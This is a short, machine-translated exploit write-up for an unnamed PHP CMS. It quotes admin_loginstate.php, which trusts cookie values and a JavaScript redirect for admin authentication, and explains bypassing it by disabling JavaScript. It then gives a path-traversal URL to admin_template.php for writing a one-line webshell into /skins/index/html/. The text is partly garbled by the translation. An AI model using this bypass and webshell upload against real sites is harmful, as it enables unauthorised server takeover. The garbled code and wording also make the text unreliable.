Search for a cms with php through the kill-vulnerability warning-the black bar safety net

ID MYHACK58:62201233247
Type myhack58
Reporter 佚名
Modified 2012-03-04T00:00:00


Author: z2681

From: 90sec

Vulnerability files to the admin directory admin_loginstate.php

Look at the code


echo "<script>window. location='admin_login.php'</script>";



elseif($_COOKIE['S_Login']!= md5($_COOKIE['S_AdminID'].$ _COOKIE['S_AdminUserName'].$ _COOKIE['S_AdminPassWord'].$ _COOKIE['S_Permission'])){

echo "<script>window. parent. location='admin_login.php'</script>";


?& gt;

Very simple see is a cookie authentication we directly prohibit the JS directly into the background

Into the background after a simple say to get the shell method

/admin/admin_template. php? action=templist&path=../skins/index/html/&tempname=default template&file=qingshen. php90

Direct access to this url and then write a sentence on it directory of course is in /skins/index/html/ directory